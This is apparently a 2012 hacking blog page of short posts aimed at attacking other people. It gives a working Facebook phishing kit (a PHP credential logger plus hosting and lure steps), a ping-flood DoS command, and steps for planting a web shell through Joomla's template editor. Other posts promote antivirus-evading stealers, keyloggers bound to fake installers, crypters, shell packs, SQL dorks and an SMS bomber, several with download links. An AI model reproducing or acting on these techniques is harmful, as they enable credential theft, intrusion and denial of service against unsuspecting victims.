Monday 27 August 2012

Nuclear DDoser + Tutorial

- 1 comments
[Continue reading...]

Hacking For Dummies [Excellent book for Ethical hacking]

- 0 comments
It's bad enough when a hack occurs-stealing identities, bank accounts, and personal information. But when the hack could have been prevented by taking basic security measures-like the ones described in this book-somehow that makes a bad situation even worse. This beginner guide to hacking examines some of the best security measures that exist and has been updated to cover the latest hacks for Windows 7 and the newest version of Linux.




[Continue reading...]

Sunday 26 August 2012

How to Make Facebook Phising page

- 1 comments


here we go for creating Fake page of Facebook...
Here we will need 3 types of files for facebook:
1. A php file with any name say login.php. This php file places main role to get the passwords of victim
2. index.html which is a fake html page similar to original Page of Facebook.
3. Photos, CSS, js files




Step 1. Creating a login.php file>
Open notepad and paste the following lines there... as save it with name login.php


Code Updated: By mistake i hv missed one line in php file, i hv add that line now. Sorry for inconvenience.


<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>




step 2. Create index.html Page:
2.1. first of all open login page of Facebook.com..... then right click there> save as/save page as> then save it....
 check the downloaded file.... there will be
one htm file(Welcome to Facebook.htm)
A folder(Welcome to Facebook_files) containing some pics, css files and js files.(this folder contains 3rd type of files that i hv mentioned above.)

2.2. Now open the htm file with notepad(right click> open with> notepad)...
 
 and then press ctrl +F and search for action... and you will find a line as shown in screenshot.
Note:in case of some other sites may be you find more then one action word... but you have to find out the exact type of line as shown in screen shot.... near which you will find a
tag and method="post" something like that.

2.3. Now replace the url written after action with the name of your php file created in step 1.

Now your fake page is ready....
Save it with name index.html


Step 3: Uploading on a Free Hosting Site:


Now you have to upload all the 3 mentioned files on a free hosting account. Here i m explaining file uploading on http://www.yourfreehosting.net/.
1. first of all sign up for a free hosting Account.


Note: yourfreehosting.net is now not available for free, you can create account on http://www.000webhost.com/473091.html .To know how to create account there, check post "How to create a FREE webhosting Account"


2. After creating Account, login there, then go to control pannel> File Manager.

3. Now remove the preexisting index.html file.


4. Now click on upload files and then upload there index.html and login.php


5. Now click on New directory to make a new folder there and name it "Welcome to Facebook_files"


6. Now open the directory
"Welcome to Facebook_files"
and then upload all the files(css,js, photos) of folder Welcome to Facebook_files,which was downloaded with facebook page in step 2.



Now your phishing page is ready to hack ;)
7. Now give url of ur index page to ur friends, as soon as they will login through ur created fake page,a new log.txt file will be created and their password will be saved in that file.
 
 
 
 
 

 
  




[Continue reading...]

Saturday 25 August 2012

Friday 24 August 2012

Rapzo Logger v1.5

- 0 comments

Stealers [6] All Stealers Pure Code - No Drops + Runtime FUD

[#] Firefox 3.5.0-3.6.X
[#] DynDns
[#] FileZilla
[#] Pidgin
[#] Imvu
[#] No-Ip

Features [25]

* Full UAC Bypass & Faster Execution
* Coded in Vb.NET
* Min Req Is .net 2.0 Now A days every pc Have it
* Cool & user friendly GUI
* Easily Understandble
* Encrypt Information
* Encrypt E-mail information
* 100% FUD from all AV's
* 4 Extentions [ . exe | .scr | .pif | .com ]
* Keylogger support - Smtp[Gmail,Hotmail,live,aol,]
* Test E-mail - is it vaild or not.
* Customize the "To" e-mail address.
* Screen Logger
* Cure.exe to remove server from your Compute
* Usb Spreade
* File pumper - Built-in
* Icon Changer - Preview
* Logs are nice and clear
* Log Letters - ABCD etc.
* Log Symbols - !@#$% etc.
* Log Numbers - 12345 etc.
* Log specific key's - [F4][F5][TAB][HOME][Pg Dn][Pause Break][Prtsc SysRq].. Etc.
* Hidden really good & invisible
* Send new logs over and over again
* ReadMe.txt - How To Use
* Vedio Tutorial - How To Use
Working on all Windows Operating System's - [Winxp\vista\W7] --- [32 + 64 ] Bit Computers 

DOWNLOAD 
[Continue reading...]

Sharp Stealer 2.5

- 1 comments
Steals:

• Firefox (All versions, included 3.5) New
• Internet Explorer (All versions, included 8) New
• Google Chorme (All versions)New
• MSN Messenger / Live Messenger (All versions)
• Yahoo Messenger (All versions)
• Yahoo ETS
• Pidgin / Gaim
• No-Ip
• DynDNS
• FileZilla
• CD Keys

Features:

•Builder GUI coded in VB6
• Stub coded in VB6
• Stub size uncompressed: 64.0 KB (65,536 bytes
• Stub size compressed with UPX: 233.KB (237,568 bytes
•OS: NT/XP/Vista/W7 New
•FUD (Runtime and Scantime) Amazing! Paid Version Not Free
• Don't use external programs Important
• All strings encrypted
• Bypass UAC in Vista/W7 New
• Test URL function in the builder New
• Php log manager (With new features) New
• Melt (Self destruction) New
• All encrypted
• Good design

DOWNLOAD 
[Continue reading...]

Setup Ardamax Keylogger To Hack ID's [Video]

- 0 comments



Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

[Continue reading...]

XSS,RFI LFI and SQLI Attacks [Ebooks]

- 0 comments
Hello Guyz toady i m sharing 3 ebooks of XSS ,LIF RFI and SQLI Explained how thery works and how to attack a site .

XSS Guide
LFI and RFI Guide
SQL Injection Guide
[Continue reading...]

Thursday 23 August 2012

Tabnapping [New Type Of Phising]

- 0 comments


Tabnapping Is the new type of phising attack
Phising : it is fake page of facebook which is sent to victim . and he logins like facebook then its email and passowrd is sent to hosting of phising

Watch Video 



[Continue reading...]

Wednesday 22 August 2012

Toxic Public Crypter [100% Fud]

- 0 comments

Toxic Public Crypter 100% FUD


Runtime + Scantime + EOF Support
 SCAN OF CYRPTED PRO RAT SERVER:


File Info


Report date: 2010-04-17 17:25:57 (GMT 1)

File name: Server.exe

File size: 440252 bytes

MD5 Hash: c69f927efed168b0f0d6abfacbbb30a7

SHA1 Hash: 1ecba9b18371428b178bad2de68491578ffe6ee9

Detection rate: 0 on 20 (0%)

Status: CLEAN

Detections
a-squared - -
Avast - -
AVG - -

Avira AntiVir - -

BitDefender - -

ClamAV - -

Comodo - -

Dr.Web - -

F-PROT6 - -

G-Data - -

Ikarus T3 - -

Kaspersky - -

McAfee - -

NOD32 - -

Panda - -

Solo - -

TrendMicro - -

VBA32 - -

VirusBuster - -

Zoner - -

Scan report generated by

NoVirusThanks.org


DOWNLOAD
[Continue reading...]

Tuesday 21 August 2012

Super Hide IP 3.2 [Crack Included]

- 1 comments



Anonymous Surfing with Super Hide IP Protect your privacy on the Internet. Use Super Hide IP to surf anonymously, prevent hackers from monitoring your online activities or identity thieves from stealing your identity and other personal information, send anonymous email, and un-ban yourself from forums or restricted websites.





[Continue reading...]

DDOS Attack [Kill the Site]

- 2 comments




[Use VPN or Ip Hiding Tool to do following Action]

[Like HotSpot Shield or Super Hide IP]


 DoS Attack Stands For Denial of Service Attack

What Is DoS?

A: Denial of Service (DoS) attackes are aggressive attacks on an individual Computer or WebSite with intent to deny services to intended users.
DoS attackes can target end-user systems, servers, routers and Network links(websites)

Requirments:
1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.

How TO GET IP OF ANY SITE??"
No problem.. here is the solution..
open ur CMD (command prompt).. and type
--------------------------------------------------
nslookup Site-Name
--------------------------------------------------
(e.g nslookup www.google.com)   [warning ! if u love urself . then dont even try to ddos on google]

It will show u ip of the site.

ohk now write this command in CMD For Attack on Any Site/ Server..
---------------------------------------------------
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
---------------------------------------------------
-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.

SITE-IP= Replace the **** with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!

This All System Is Known As "PING OF DEATH"

[Continue reading...]

Cryptex Advanced Crypter [Cracked]

- 0 comments

 
 
DOWNLOAD
[Continue reading...]

Monday 20 August 2012

How To Upload Shell In JOOMLA

- 0 comments



Hello Guyz Today im sharing a tut How to Upload Shell In Joomla

1. Suppose we have an access to joomla admin. 
2.  Once you Login you see the below screen.


3. Then look for Extensions and in that Template Manager.

 
4. Once you click on that you will see all the templates installed on that site.


Now U see template Named Beez Click On it

6. Once you click on beez you will see the following screen. now just click on edit html

8. Once you click on edit html you will see the following screen

 

see the red part /templates/beez/index.php that is the path of your shell

9. Now just paste your shell code over their and save it


10. Once you click on save. it will take you to page were it will show you Template source saved. you work is done

Once that is done you can access your shell. Path of the shell would be
                                           www.site.com/templates/beez/index.php




 
 
 


[Continue reading...]

Huge List Of SQL Dorks

- 0 comments


Dorks Are very use ful to scan Vulnerable sites . So Today im giving you a list of dorks for you
So Enjoy guyz


View List
[Continue reading...]

Friday 17 August 2012

How To Hack ID's With Rin Logger

- 0 comments


DOWNLOAD RIN Logger



Now, enter the information as follows:
Email address: your email address (gmail recommended)
Account Password: Password of your Email address.
Keylogger Recipients: Enter your Email address
Click on next


4. Now, enter the time duration between two emails. If you set it to 2 minutes, you will receive emails after every 2 minutes. Hit on Next.

5. Now, change Install keylogger to “Enabled”. Name the file anything you want and select Installation path as “Startup”.


You can use all other options according to your needs. But, I am focusing on important aspects only. Hit on Next until you see this option:
 6. Hit on “?” button besides every textbox to generate random product information. Hit on Next.
7. Now, hit on “Save As” and select the path where you want to save your keylogger server file. Click on “Compile”. Done!!!

That’s it. You have successfully created a keylogger server file. Now, simply send this file to your friend. You can use the Binder within this keylogger or can even opt for Iexpress binder to bind this keylogger server to any .exe file may be software or so. This will remove any chances of doubt on victim’s side.
Thus, the victim will run the file considering it as a normal software installation and during this process, our sent keylogger server will install itself silently in background without any victim’s knowledge.
After keylogger server installation, you will start receiving all victim passwords like this:


Thus, now you can easily hack Gmail account password of your friend. Cheers!!!

[Continue reading...]

Z-A Pakistani SMS Bomber (Fast Speed)

- 9 comments




Z-A's Pakistani SMS Bomber
Created By ME & Zaryab Jamil
Greets:- 
 Mudassar Nazar - Maher Bro - Zaryab Jamil

Nice Speed 
Sms Counter


DOWNLOAD
[Continue reading...]

Thursday 16 August 2012

How To Fix Windows Errors (Keep your Windows live long)

- 0 comments


Today i will tell your how to fix windows errors and drive volume fixer
it repairs currupted files in the hard disk and keeps your windows clean

Ok lets Start

1. Go To Start >run > type chkdsk   press Enter

Now it will scan all drives and fix corrupted files and errors


[Continue reading...]

How To make .exe file Icon Changer ||Visual Basic Tutorial||

- 1 comments


Hello Guyz today i will tell u how to create an .EXE file Icon changer in Vb


1st of all open vb and create new Project

Now from Tool Box add following things

2 textboxes
3 buttons
1 openfiledialog

button1 = browse .exe file
button 2 = browse icon
button 3= Change Icon

textbox1 = .exe file location
textbox2 = ico file location

Now lets Start Coding

first double click on form1 and before
Public Class Form1

add this Code

Imports System.IO
Imports fLaSh.Dissembler

now Double Click on Button 1 and add this code
OpenFileDialog1.DefaultExt = "exe"
        OpenFileDialog1.Filter = "exe files (*.exe)|*.exe"
        OpenFileDialog1.FilterIndex = 1
        If OpenFileDialog1.ShowDialog(Me) = DialogResult.OK Then
            TextBox1.Text = String.Empty
            TextBox1.Text = OpenFileDialog1.FileName
        End If

then Double Click on button2 and add this code

  OpenFileDialog1.DefaultExt = "ico"
        OpenFileDialog1.Filter = "icon files (*.ico)|*.ico"
        OpenFileDialog1.FilterIndex = 1
        If OpenFileDialog1.ShowDialog(Me) = DialogResult.OK Then
            TextBox2.Text = String.Empty
            TextBox2.Text = OpenFileDialog1.FileName
        End If

Now double Click on button3 and add this code

If TextBox1.Text = "" Then Exit Sub
If TextBox2.Text = "" Then Exit Sub
Dim oIconFilenathu As New IconFile(TextBox2.Text)
Dim groupIconResource As GroupIconResource = oIconFilenathu.ConvertToGroupIconResource()
groupIconResource.SaveTo(TextBox1.Text)
MsgBox("Icon Changed Successfully!")

your Icon Changer Is Ready

Comment Here if u have difficulty :)



 
[Continue reading...]

Wednesday 15 August 2012

Havij Sql Injection + Upload Shell + Deface Site [full tutorial]

- 1 comments




Things Need

1. Havij Automated Sql injection Tool   DOWNLOAD From Here 
2. A Shell   DOWNLOAD SHELL  
3. Security [ use Tor browser to browse anonymously DOWNLOAD TOR

Watch Tutorial
[Continue reading...]

Some Best Important ||Shells||

- 0 comments




the shells are most important to hack a website . Today i m sharing some important powerfull shells
which are very useful to deface a site

1. c100
2. B374K
3. WSO Shell
4.  Madspot shell
5. Priv8 Shell [ used to get wordpress or joomla admin login in symlink]


DOWNLOAD PACK
[Continue reading...]
 
Theme Template by BTDesigner · Powered by Blogger